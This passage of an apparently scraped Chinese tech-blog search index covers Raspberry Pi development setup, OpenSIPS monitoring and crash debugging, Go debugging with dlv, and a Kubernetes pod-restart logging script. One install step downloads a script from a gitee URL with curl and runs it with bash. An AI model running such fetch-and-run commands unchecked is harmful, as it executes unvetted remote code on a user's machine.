lines set cursorline set tabstop=4 set shiftwidth=4 set expandtab set background=dark \u0026#34; colorscheme solarized \u0026#34; let g:ackprg = \u0026#39;rg --vimgrep --type-not sql --smart-case\u0026#39; map ; : autocmd FileType javascript setlocal ts=2 sts=2 shiftwidth=2 但是没有go-vim写golang还是不太方便的,特别是保存的时候格式化,但是也有方案, 执行vim的Ex命令,:!go fmt % 视频 看视频是非常危险的行为,有可能需要强制关机重启。 ","permalink":"https://wdd.js.org/posts/2021/08/mlg4mt/","summary":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提是不要加载太多的neovim插件,特别像coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug 
\u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; first buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; last buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; alternate buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!","title":"使用树莓派3b+作为辅助开发体验"},{"content":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃后会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 
\u0026lsquo;real_used_size\u0026rsquo;, 真实使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多的一些指标,可以使用:opensipsctl fifo get_statistics all来获取。\n","permalink":"https://wdd.js.org/opensips/ch3/prd-warning/","summary":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃后会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 \u0026lsquo;real_used_size\u0026rsquo;, 真实使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多的一些指标,可以使用:opensipsctl fifo get_statistics all来获取。","title":"生产环境监控告警"},{"content":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于根目录下,名字如core.xxxx等的。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要保证系统的磁盘空间足够。\n如何开启core dump? 
第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为yes, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法,\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词\nat 1ea72b5 尝试访问的内存地址偏移 error 4 错误的类型 fault was an instruction fetch ip 00000000004be532 指令指针的位置, 注意这个4be532 sp 00007ffe9e1e6df0 栈指针的位置 400000+203000 x86架构 /* * Page fault error code bits * bit 0 == 0 means no page found, 1 means protection fault * bit 1 == 0 means read, 1 means write * bit 2 == 0 means kernel, 1 means user-mode * bit 3 == 1 means use of reserved bit detected * bit 4 == 1 means fault was an instruction fetch */ #define PF_PROT (1\u0026lt;\u0026lt;0) #define PF_WRITE (1\u0026lt;\u0026lt;1) #define PF_USER (1\u0026lt;\u0026lt;2) #define PF_RSVD (1\u0026lt;\u0026lt;3) #define PF_INSTR (1\u0026lt;\u0026lt;4) 使用objdump, 可以将二进制文件,反汇编找到对应代码的位置。比如说我们可以在反汇编的输出中搜索4be532,就可以找到对应代码的位置。\nobjdump -j .text -ld -C -S $(which opensips) \u0026gt; op.txt 然后我们在op.txt中搜索4be532, 就能找到对应的源码或者函数的位置。然后根据源码分析问题。\n参考 https://www.opensips.org/Documentation/TroubleShooting-Crash https://stackoverflow.com/questions/2549214/interpreting-segfault-messages https://stackoverflow.com/questions/2179403/how-do-you-read-a-segfault-kernel-log-message/2179464#2179464 
https://rgeissert.blogspot.com/p/segmentation-fault-error.html ","permalink":"https://wdd.js.org/opensips/ch7/crash/","summary":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于根目录下,名字如core.xxxx等的。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要保证系统的磁盘空间足够。\n如何开启core dump? 第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为yes, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法,\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词","title":"opensips崩溃分析"},{"content":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志可能会写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比往日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。\n","permalink":"https://wdd.js.org/opensips/ch7/can-not-run/","summary":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志可能会写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比往日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。","title":"opensips无法启动"},{"content":"选择哪个版本的系统? 
不要过高地估计树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡的想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface eth0 inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo raspi-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓派是armhf架构的,所以在这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PATH中,就能使用golang了。\n如何安装最新版本的node.js curl -L https://gitee.com/wangduanduan/install-node/raw/master/bin/n -o n bash n lts 如何安装谷歌浏览器? sudo apt full-upgrade sudo apt install chromium-browser -y 使用清华apt源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/ # 编辑 `/etc/apt/sources.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi # 编辑 `/etc/apt/sources.list.d/raspi.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspberrypi/ buster main ui 如何安装截图工具? sudo apt-get install -y flameshot 使用树莓派在浏览器上看视频怎么样? 非常卡\n","permalink":"https://wdd.js.org/posts/2021/08/uuvor0/","summary":"选择哪个版本的系统? 
不要过高地估计树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡的想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface eth0 inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo raspi-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓派是armhf架构的,所以在这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PATH中,就能使用golang了。","title":"树莓派3b+踩坑记录"},{"content":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并不存在于上述文章中。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一种表现形式,和server端分离出来。\n","permalink":"https://wdd.js.org/posts/2021/08/kbcih7/","summary":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并不存在于上述文章中。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一种表现形式,和server端分离出来。","title":"js sdk 跨层穿透问题"},{"content":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 
所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是普通代码,而是测试代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置断点 \u0026gt; bp # print all breakpoints \u0026gt; c # continue to exe \u0026gt; p variableName ","permalink":"https://wdd.js.org/golang/debug-with-dlv/","summary":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是普通代码,而是测试代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置断点 \u0026gt; bp # print all breakpoints \u0026gt; c # continue to exe \u0026gt; p variableName ","title":"Debug With Dlv"},{"content":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《墨菲定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重置为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不再重连 if currentReconnectTimes \u0026gt; maxConnectTimes { return } // 如果已经存在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2. 如何快速定位问题 第一,代码的敬畏之心 第二,及时告警。日志,或者http请求 第三,编程时,就要考虑异常。例如程序依赖 MQ或者Mysql,当与之交互的连接断开后,应该怎样处理? 
第四,多实例问题考虑 第五,检查清单\n","permalink":"https://wdd.js.org/posts/2021/08/brh6mu/","summary":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《墨菲定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重置为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不再重连 if currentReconnectTimes \u0026gt; maxConnectTimes { return } // 如果已经存在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2.","title":"面向异常编程todo"},{"content":"一般来说,监控pod状态重启和告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想在某个pod重启时,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.old.log; then # 如果存在,则取出之前记录的重启次数 t=$(grep $name restart.old.log | awk \u0026#39;{print $2}\u0026#39;) # 和本次记录的重启次数比较,如果本次的重启次数较大 # 则说明pod一定重启过 if [ $count -gt $t ]; then echo $now ERROR pod_restart $name 
\u0026gt;\u0026gt; $log_file fi else # 如果重启的pod不存在之前的记录中,也说明pod重启过 echo $now ERROR pod_restart $name \u0026gt;\u0026gt; $log_file fi done \u0026lt; restart.now.log # 删除老的记录文件 rm -f restart.old.log # 将新的记录文件重命名为老的记录文件 mv restart.now.log restart.old.log 然后可以将上面的脚本做成定时任务,每分钟执行一次。那么就可以将pod重启的信息写入文件。\n然后配合一些日志监控的程序,就可以监控日志文件。然后提取关键词,最后发送告警信息。\n其实我们也可以在写告警日志文件的同时,通过curl发送http请求,来发送告警通知。\n在公有云上,可以使用钉钉的通知webhook, 也是非常方便的。\n","permalink":"https://wdd.js.org/posts/2021/07/giqfii/","summary":"一般来说,监控pod状态重启和告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想在某个pod重启时,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.","title":"监控pod重启并写日志文件"},{"content":"本来我的目的是使用cluster模块fork出多个进程,让各个进程都能处理udp消息。但是最终测试发现,实际上仅有一个进程处理了绝大多数消息,其他的进程,要么不处理消息,要么只处理非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 
${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { logger.info(`udp server error:\\n${err.stack}`) server.close() }) server.on(\u0026#39;message\u0026#39;, (msg, rinfo) =\u0026gt; { logger.info(`${process.pid} udp server got: ${msg} from ${rinfo.address}:${rinfo.port}`) }) server.on(\u0026#39;listening\u0026#39;, () =\u0026gt; { const address = server.address() logger.info(`udp server listening ${address.address}:${address.port}`) }) server.bind(port) } 日志库如下:\nconst logger = require(\u0026#39;pino\u0026#39;)() module.exports = { logger } 启动服务之后,从日志中可以看到:启动了四个进程。\n{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194869,\u0026#34;pid\u0026#34;:98795,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194870,\u0026#34;pid\u0026#34;:98797,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194872,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194876,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} 然后我们使用nc, 来向这个udpserver发送消息\nnc -u 0.0.0.0 8088 ... 
然后观察server的日志发现:\n基本上所有的消息都被最后一个进程消费 pid 98798 消费一个消息 其他进程没有消费消息 {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601201509,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: adf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202172,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: asdflasdf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202382,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202545,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202678,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 